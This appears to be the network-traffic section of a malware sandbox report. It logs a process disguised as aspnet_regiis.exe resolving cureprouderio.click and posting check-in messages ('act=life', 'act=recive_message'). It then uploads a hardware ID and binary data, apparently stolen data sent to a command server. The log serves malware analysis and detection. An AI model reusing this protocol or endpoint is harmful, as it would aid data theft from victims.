                                                                                            Jan 5, 2025 20:42:02.619443893 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.619576931 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.619606972 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.619770050 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.619802952 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.619970083 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.619997978 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.620013952 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.620026112 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.620212078 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.620239019 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.620264053 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.620415926 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.620445967 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.629105091 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.629288912 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.629308939 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.629334927 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.629349947 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:02.629385948 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:02.634601116 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:05.835055113 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:05.835143089 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:05.835199118 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:05.835355043 CET49736443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:05.835367918 CET44349736172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:05.874202967 CET49737443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:05.874241114 CET44349737172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:05.874320030 CET49737443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:05.874579906 CET49737443192.168.2.4172.67.132.7
                                                                                            Jan 5, 2025 20:42:05.874594927 CET44349737172.67.132.7192.168.2.4
                                                                                            Jan 5, 2025 20:42:06.017940044 CET49737443192.168.2.4172.67.132.7
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 5, 2025 20:41:54.045515060 CET5919453192.168.2.41.1.1.1
                                                                                            Jan 5, 2025 20:41:54.058430910 CET53591941.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 5, 2025 20:41:54.045515060 CET192.168.2.41.1.1.10x624bStandard query (0)cureprouderio.clickA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 5, 2025 20:41:54.058430910 CET1.1.1.1192.168.2.40x624bNo error (0)cureprouderio.click172.67.132.7A (IP address)IN (0x0001)false
                                                                                            Jan 5, 2025 20:41:54.058430910 CET1.1.1.1192.168.2.40x624bNo error (0)cureprouderio.click104.21.4.114A (IP address)IN (0x0001)false
                                                                                            • cureprouderio.click
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449730172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:41:54 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:41:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2025-01-05 19:41:55 UTC1129INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:41:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=pjmct79kdjgv0ensvl0prorstp; expires=Thu, 01 May 2025 13:28:33 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lX0cxD%2Fi3r9aYCMpbv5upAIUPbd8P8pNmbJq0n9wi8L0qKp1vwwaYLX1Hz5EdUYgp9lMemiVuJwjxDT%2F%2B01hg0jw%2FnRqZAkm0cAYbzolyNikRKpVvB62%2BK4Kv5GWdT9eHgX3sL3m"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fd5f2d0bb407298-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1794&rtt_var=689&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=910&delivery_rate=1570736&cwnd=182&unsent_bytes=0&cid=f69016bbacb289ca&ts=519&x=0"
                                                                                            2025-01-05 19:41:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2025-01-05 19:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449731172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:41:55 UTC267OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 54
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:41:55 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--gyfsshbyotsj&j=
                                                                                            2025-01-05 19:41:56 UTC1127INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:41:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=g157uki4aocnqmu0nrlsrpg372; expires=Thu, 01 May 2025 13:28:34 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yw8hQ6DMn%2B1Q150UK2M9f3BMv3zA1F15xp0AaUcbBtA%2Brlxgn5nt1h5Qw5jKYOO4DR49GGsYFZkXFM20GynghcaL8lpDfcSAxOLc%2FGRNxaL4d6xlfrwgTFXqawKy%2FcuKh7xmIrn8"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fd5f2d71fa8c459-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1660&rtt_var=639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=957&delivery_rate=1689814&cwnd=231&unsent_bytes=0&cid=2650ec8ba4f089df&ts=568&x=0"
                                                                                            2025-01-05 19:41:56 UTC242INData Raw: 34 36 39 0d 0a 58 73 77 39 45 34 59 7a 6f 66 2b 2b 58 64 76 54 51 45 61 79 42 76 73 33 38 42 34 43 67 6d 74 5a 34 6d 66 55 69 4a 77 58 74 50 30 6c 37 6b 73 78 76 41 65 4e 33 63 30 34 2b 65 6b 30 4e 4d 64 6a 31 78 57 52 65 69 43 34 44 54 69 4f 46 4c 47 6b 76 6d 48 5a 33 32 53 71 58 48 2f 31 56 6f 33 64 32 79 58 35 36 52 73 39 6b 47 4f 56 46 63 6f 38 5a 2b 67 4a 4f 49 34 46 74 65 50 7a 5a 39 69 65 4e 71 42 61 65 2b 4e 51 78 5a 37 53 4d 4c 36 32 4a 53 66 59 61 4a 4a 61 6d 48 4d 67 72 6b 6b 38 6d 45 58 75 71 74 46 79 77 4a 77 54 72 55 35 34 70 45 36 4e 68 4a 77 34 74 66 46 36 5a 4e 4e 6a 6d 56 75 57 65 6d 6e 71 41 7a 47 47 42 4c 44 69 37 48 37 53 6c 54 61 75 57 58 72 70 57 64 47 54 32 44 65 31 73 43 38 6e 6b 43 72 5a 55
                                                                                            Data Ascii: 469Xsw9E4Yzof++XdvTQEayBvs38B4CgmtZ4mfUiJwXtP0l7ksxvAeN3c04+ek0NMdj1xWReiC4DTiOFLGkvmHZ32SqXH/1Vo3d2yX56Rs9kGOVFco8Z+gJOI4FtePzZ9ieNqBae+NQxZ7SML62JSfYaJJamHMgrkk8mEXuqtFywJwTrU54pE6NhJw4tfF6ZNNjmVuWemnqAzGGBLDi7H7SlTauWXrpWdGT2De1sC8nkCrZU
                                                                                            2025-01-05 19:41:56 UTC894INData Raw: 6f 6f 38 4f 4b 42 61 43 59 4d 55 70 2f 2f 7a 5a 64 44 66 49 2b 42 47 4d 65 4e 64 67 38 57 63 4e 37 57 2f 4a 79 66 66 59 35 68 56 67 48 4e 67 34 77 45 7a 68 41 2b 35 35 66 46 37 33 4a 67 30 70 31 68 2b 34 31 6e 46 6b 74 39 2f 39 2f 45 6c 50 4a 41 38 32 58 57 43 66 32 50 30 42 43 72 41 47 76 6a 7a 76 6e 4c 61 33 32 54 75 57 58 2f 6c 58 4d 4f 50 31 44 53 79 74 44 41 76 32 57 6d 55 56 5a 39 32 62 2b 4d 4a 50 49 6f 50 75 65 44 36 65 4e 75 5a 50 4b 34 66 50 36 52 57 32 39 32 45 66 35 71 30 4d 69 50 63 63 74 74 76 30 6d 4d 75 2b 55 6b 38 6a 45 58 75 71 76 5a 77 31 5a 77 33 6f 56 78 35 37 30 50 44 6a 39 6f 79 76 4b 4d 6b 49 64 35 75 6d 6b 65 59 63 6d 62 6a 41 44 43 4a 41 4c 48 75 76 6a 75 57 6d 43 54 75 42 7a 48 46 58 4d 69 52 31 69 69 35 38 54 31 71 79 53 53 65
                                                                                            Data Ascii: oo8OKBaCYMUp//zZdDfI+BGMeNdg8WcN7W/JyffY5hVgHNg4wEzhA+55fF73Jg0p1h+41nFkt9/9/ElPJA82XWCf2P0BCrAGvjzvnLa32TuWX/lXMOP1DSytDAv2WmUVZ92b+MJPIoPueD6eNuZPK4fP6RW292Ef5q0MiPccttv0mMu+Uk8jEXuqvZw1Zw3oVx570PDj9oyvKMkId5umkeYcmbjADCJALHuvjuWmCTuBzHFXMiR1ii58T1qySSe
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 33 39 65 39 0d 0a 57 65 58 57 35 56 71 49 50 39 48 49 73 41 43 75 71 71 6d 4e 64 6d 51 4d 36 5a 66 63 4f 42 63 78 35 7a 52 4d 37 43 79 4c 69 6a 59 61 5a 56 52 6e 58 52 6f 34 77 45 70 6a 67 75 77 37 50 35 77 6c 74 46 38 71 55 63 78 76 42 48 6e 6b 38 73 72 73 76 4d 58 4a 39 35 71 6e 6b 50 53 59 79 37 35 53 54 79 4d 52 65 36 71 38 48 6a 64 6b 7a 75 6e 58 6e 4c 6b 57 38 32 53 31 6a 65 78 73 53 38 6c 32 32 79 66 57 4a 6c 7a 62 2b 63 42 4f 49 77 41 75 2b 6d 2b 4f 35 61 59 4a 4f 34 48 4d 63 46 66 77 49 7a 4e 66 59 79 79 4c 43 72 58 63 74 6c 4b 33 47 55 67 35 77 56 37 32 45 57 38 37 66 6c 78 32 35 55 2f 71 6c 74 38 36 31 6a 4b 6c 4d 34 31 74 62 38 77 4b 64 70 68 6c 31 6d 58 63 32 44 68 43 44 57 4b 44 76 61 6b 76 6e 4c 4f 33 32 54 75 63 48 7a 30 51 38 6d 57 7a 58
                                                                                            Data Ascii: 39e9WeXW5VqIP9HIsACuqqmNdmQM6ZfcOBcx5zRM7CyLijYaZVRnXRo4wEpjguw7P5wltF8qUcxvBHnk8srsvMXJ95qnkPSYy75STyMRe6q8HjdkzunXnLkW82S1jexsS8l22yfWJlzb+cBOIwAu+m+O5aYJO4HMcFfwIzNfYyyLCrXctlK3GUg5wV72EW87flx25U/qlt861jKlM41tb8wKdphl1mXc2DhCDWKDvakvnLO32TucHz0Q8mWzX
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 50 4a 41 38 32 58 71 52 61 6d 71 67 46 6e 57 5a 52 62 48 6d 76 69 32 57 6c 54 43 71 58 48 33 74 58 63 36 63 32 44 69 30 74 53 49 69 31 6d 47 59 58 70 70 77 62 2b 6f 46 50 34 77 4d 73 4f 62 39 64 74 44 66 63 75 35 59 61 61 51 4a 67 37 7a 52 4e 4c 57 78 49 54 58 58 4a 4e 63 56 6e 48 70 67 6f 46 45 74 6b 42 4b 78 39 62 42 73 6c 70 67 77 37 67 63 78 37 6b 50 47 6b 39 67 31 76 4c 55 75 4c 74 42 68 69 31 32 55 65 32 7a 6f 44 44 53 47 41 4c 76 74 39 58 62 45 6a 54 2b 71 55 58 32 6b 48 34 4f 61 78 48 2f 68 38 51 63 7a 30 33 53 66 56 74 4a 6a 4c 76 6c 4a 50 49 78 46 37 71 72 2b 65 39 71 55 4f 36 56 55 64 65 42 52 7a 70 62 53 4d 62 43 39 4b 69 6a 58 64 70 52 51 6d 6e 5a 70 35 51 55 32 67 78 65 31 36 37 34 37 6c 70 67 6b 37 67 63 78 77 32 4c 30 76 70 77 67 39 36 68
                                                                                            Data Ascii: PJA82XqRamqgFnWZRbHmvi2WlTCqXH3tXc6c2Di0tSIi1mGYXppwb+oFP4wMsOb9dtDfcu5YaaQJg7zRNLWxITXXJNcVnHpgoFEtkBKx9bBslpgw7gcx7kPGk9g1vLUuLtBhi12Ue2zoDDSGALvt9XbEjT+qUX2kH4OaxH/h8Qcz03SfVtJjLvlJPIxF7qr+e9qUO6VUdeBRzpbSMbC9KijXdpRQmnZp5QU2gxe16747lpgk7gcxw2L0vpwg96h
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 4d 45 56 76 6e 39 76 36 30 6b 6b 7a 68 7a 32 37 66 49 31 6a 74 38 37 70 6c 64 2f 35 31 66 49 6b 64 41 2b 73 4c 63 6e 4c 4e 64 72 6e 6c 79 56 66 47 62 79 44 6a 61 4a 42 62 33 6a 39 48 48 58 6c 48 7a 67 48 33 62 38 45 5a 76 64 37 6a 69 76 6f 53 46 6b 7a 79 71 41 46 5a 56 77 49 4c 68 4a 4e 70 49 45 73 2f 6a 36 65 74 32 4e 4e 36 68 66 64 50 5a 57 7a 35 66 54 50 4c 47 38 49 53 7a 43 5a 4a 52 56 67 47 35 6d 36 77 64 37 7a 6b 57 78 38 72 34 74 6c 71 34 72 70 52 39 75 71 6b 69 44 6d 74 42 2f 34 66 45 68 4c 74 31 71 69 31 47 55 64 32 50 75 41 54 36 49 41 62 7a 6e 38 58 37 63 6c 6a 53 75 55 48 54 73 57 73 57 54 33 54 6d 31 76 47 4a 71 6b 47 4f 42 46 63 6f 38 52 2f 6f 45 50 5a 63 55 67 2b 33 2b 4a 4a 61 41 63 72 63 66 64 75 67 52 6d 39 33 52 4d 37 4f 38 4a 79 44 59
                                                                                            Data Ascii: MEVvn9v60kkzhz27fI1jt87pld/51fIkdA+sLcnLNdrnlyVfGbyDjaJBb3j9HHXlHzgH3b8EZvd7jivoSFkzyqAFZVwILhJNpIEs/j6et2NN6hfdPZWz5fTPLG8ISzCZJRVgG5m6wd7zkWx8r4tlq4rpR9uqkiDmtB/4fEhLt1qi1GUd2PuAT6IAbzn8X7cljSuUHTsWsWT3Tm1vGJqkGOBFco8R/oEPZcUg+3+JJaAcrcfdugRm93RM7O8JyDY
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 78 6c 49 4f 63 46 65 39 68 46 75 4f 66 34 64 4e 65 58 4e 4b 35 5a 65 2b 42 53 79 70 37 62 4e 72 2b 36 49 53 37 66 59 35 39 52 6b 6e 64 6e 37 67 38 2b 69 77 7a 32 70 4c 35 79 7a 74 39 6b 37 6e 6c 53 39 6b 50 78 6b 39 38 6b 2b 61 35 73 50 5a 42 6a 6c 52 58 4b 50 47 76 6f 42 69 6d 46 44 4c 37 75 39 33 58 53 6c 54 47 70 58 33 54 70 56 4d 65 54 32 44 69 35 76 53 30 6a 32 47 75 64 56 5a 30 38 4c 71 41 4f 49 38 42 64 39 73 72 31 59 2f 65 52 4e 37 77 66 62 71 70 49 67 35 72 51 66 2b 48 78 4c 43 33 52 62 4a 64 5a 6d 6e 68 79 34 41 49 79 6a 77 53 35 36 76 31 30 33 4a 63 75 71 46 39 36 37 46 62 4c 6d 64 49 74 75 4c 35 69 61 70 42 6a 67 52 58 4b 50 46 48 32 44 6a 79 50 52 35 2f 74 35 58 54 63 6e 44 65 69 48 32 36 71 53 49 4f 61 30 48 2f 68 38 53 38 6f 33 57 43 4c 57
                                                                                            Data Ascii: xlIOcFe9hFuOf4dNeXNK5Ze+BSyp7bNr+6IS7fY59Rkndn7g8+iwz2pL5yzt9k7nlS9kPxk98k+a5sPZBjlRXKPGvoBimFDL7u93XSlTGpX3TpVMeT2Di5vS0j2GudVZ08LqAOI8Bd9sr1Y/eRN7wfbqpIg5rQf+HxLC3RbJdZmnhy4AIyjwS56v103JcuqF967FbLmdItuL5iapBjgRXKPFH2DjyPR5/t5XTcnDeiH26qSIOa0H/h8S8o3WCLW
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 67 55 58 75 4c 43 37 50 72 38 6e 2f 52 6b 53 36 76 56 58 33 6c 56 73 53 57 7a 6a 53 72 75 69 6f 6e 33 6d 79 51 56 5a 78 38 59 65 30 4a 65 38 35 46 73 66 4b 2b 4c 5a 61 36 48 37 6c 4a 65 36 5a 79 31 49 76 57 4f 4c 57 6e 4b 53 58 54 63 70 52 46 30 6a 49 67 38 51 34 71 77 46 32 67 2b 75 6c 79 79 64 45 6c 37 6c 68 39 70 41 6d 44 6c 74 4d 78 74 4c 6f 6d 4c 64 56 73 6d 6c 43 58 64 6d 7a 73 43 44 4f 4a 44 37 50 76 2b 48 2f 56 6b 54 4f 76 55 33 58 74 58 38 72 64 6b 6e 2b 2b 71 57 4a 38 6b 46 4b 4a 55 6f 70 78 63 4b 49 37 4f 4a 45 55 6f 2b 66 75 63 35 53 77 50 36 4a 63 64 4f 4e 42 67 34 4b 53 4a 76 6d 32 4c 6d 53 49 4a 4a 6c 52 6e 6e 39 6e 37 67 59 32 6a 77 4b 39 35 66 52 37 78 4a 41 35 70 6c 4e 35 36 55 50 4a 6c 38 34 32 73 4c 77 73 4c 4d 4a 6e 32 52 76 53 65 33
                                                                                            Data Ascii: gUXuLC7Pr8n/RkS6vVX3lVsSWzjSruion3myQVZx8Ye0Je85FsfK+LZa6H7lJe6Zy1IvWOLWnKSXTcpRF0jIg8Q4qwF2g+ulyydEl7lh9pAmDltMxtLomLdVsmlCXdmzsCDOJD7Pv+H/VkTOvU3XtX8rdkn++qWJ8kFKJUopxcKI7OJEUo+fuc5SwP6JcdONBg4KSJvm2LmSIJJlRnn9n7gY2jwK95fR7xJA5plN56UPJl842sLwsLMJn2RvSe3
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 75 55 58 2b 71 73 45 37 6c 6f 64 38 39 68 39 45 35 31 2f 4e 6d 73 6f 75 39 4a 41 76 4c 39 78 70 6c 6c 37 53 4d 69 44 6d 53 57 50 51 53 2f 62 75 37 7a 57 4f 7a 32 37 31 43 69 4b 7a 41 5a 47 43 6b 69 62 35 70 32 4a 38 67 69 72 5a 52 39 49 6b 49 4b 63 4b 4b 5a 49 44 74 66 7a 39 4d 75 69 68 48 37 6c 4a 65 2f 38 54 35 5a 72 4e 4e 71 2b 38 4d 42 72 75 53 70 52 55 6b 58 49 69 30 52 38 32 6b 41 61 7a 37 63 42 4c 32 4a 67 6f 71 56 46 33 35 42 47 4e 33 64 4e 2f 34 59 68 69 62 4a 42 62 31 78 57 4b 50 44 69 67 50 44 69 4f 43 37 48 38 37 7a 6a 31 69 43 71 6b 52 44 50 43 56 74 4b 55 79 6a 4b 72 38 57 78 6b 31 69 54 42 42 64 77 38 5a 50 46 4a 59 39 42 58 37 62 2b 74 49 6f 62 4e 49 2b 42 47 4d 66 49 52 6d 38 2b 53 66 36 76 78 65 6d 53 58 5a 34 74 48 6c 48 39 32 34 30 34
                                                                                            Data Ascii: uUX+qsE7lod89h9E51/Nmsou9JAvL9xpll7SMiDmSWPQS/bu7zWOz271CiKzAZGCkib5p2J8girZR9IkIKcKKZIDtfz9MuihH7lJe/8T5ZrNNq+8MBruSpRUkXIi0R82kAaz7cBL2JgoqVF35BGN3dN/4YhibJBb1xWKPDigPDiOC7H87zj1iCqkRDPCVtKUyjKr8Wxk1iTBBdw8ZPFJY9BX7b+tIobNI+BGMfIRm8+Sf6vxemSXZ4tHlH92404
                                                                                            2025-01-05 19:41:56 UTC1369INData Raw: 76 75 2b 4c 59 62 4e 5a 2f 73 4d 4a 72 51 44 33 4e 50 46 66 36 2f 78 65 6e 61 65 4a 49 73 56 79 6a 77 6e 34 78 73 70 68 67 61 67 36 62 6c 4c 36 4b 6f 2f 6f 46 46 32 38 6d 54 41 6a 4e 38 2f 73 6f 38 63 42 64 35 76 6e 6c 6d 45 51 6c 37 56 43 6a 57 4f 41 71 44 37 76 6a 75 57 6b 48 7a 32 5a 6a 47 73 45 66 7a 54 6e 43 66 35 36 57 49 52 30 32 71 58 55 6f 52 74 4c 64 55 4b 4b 6f 4d 46 76 61 71 77 4e 64 44 66 5a 50 77 52 4d 65 42 41 67 38 57 4d 62 65 4c 6b 63 58 4f 41 4e 6f 59 62 69 7a 78 32 6f 46 46 70 7a 6b 57 6b 71 71 59 31 6b 5a 77 75 76 46 6c 79 38 6c 4b 45 6f 2b 49 5a 75 72 59 6b 4a 39 35 7a 69 42 65 39 66 32 76 73 42 54 79 57 4f 34 6a 2f 2f 58 76 59 6d 43 71 2f 48 7a 2b 6b 58 6f 50 46 35 58 2b 6f 75 79 56 6f 6d 43 69 49 52 70 78 33 64 75 64 4a 42 4d 35 46
                                                                                            Data Ascii: vu+LYbNZ/sMJrQD3NPFf6/xenaeJIsVyjwn4xsphgag6blL6Ko/oFF28mTAjN8/so8cBd5vnlmEQl7VCjWOAqD7vjuWkHz2ZjGsEfzTnCf56WIR02qXUoRtLdUKKoMFvaqwNdDfZPwRMeBAg8WMbeLkcXOANoYbizx2oFFpzkWkqqY1kZwuvFly8lKEo+IZurYkJ95ziBe9f2vsBTyWO4j//XvYmCq/Hz+kXoPF5X+ouyVomCiIRpx3dudJBM5F


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449732172.67.132.74437332C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-05 19:41:56 UTC275OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=B19UGHS7
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18110
                                                                                            Host: cureprouderio.click
                                                                                            2025-01-05 19:41:56 UTC15331OUTData Raw: 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a 2d 2d 42 31 39 55 47 48 53 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                            Data Ascii: --B19UGHS7Content-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--B19UGHS7Content-Disposition: form-data; name="pid"2--B19UGHS7Content-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj--B19UGHS7Content-D
                                                                                            2025-01-05 19:41:56 UTC2779OUTData Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b
                                                                                            Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                                            2025-01-05 19:41:57 UTC1127INHTTP/1.1 200 OK
                                                                                            Date: Sun, 05 Jan 2025 19:41:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=8b891vm15uj4pdaijdq761tln3; expires=Thu, 01 May 2025 13:28:36 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRmV5bUhN1i%2B13ABXsieDG2nFLE6BTiEgafmaUWseDFqz4IkeL5epHAwHrVosdQY0rbBF2cKyMbdb%2BXe50KqdEaQV9sv8AK4mGLzYhFzy3DkGw4CbNIYwtOnl7xFWawkoFXny7oF"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
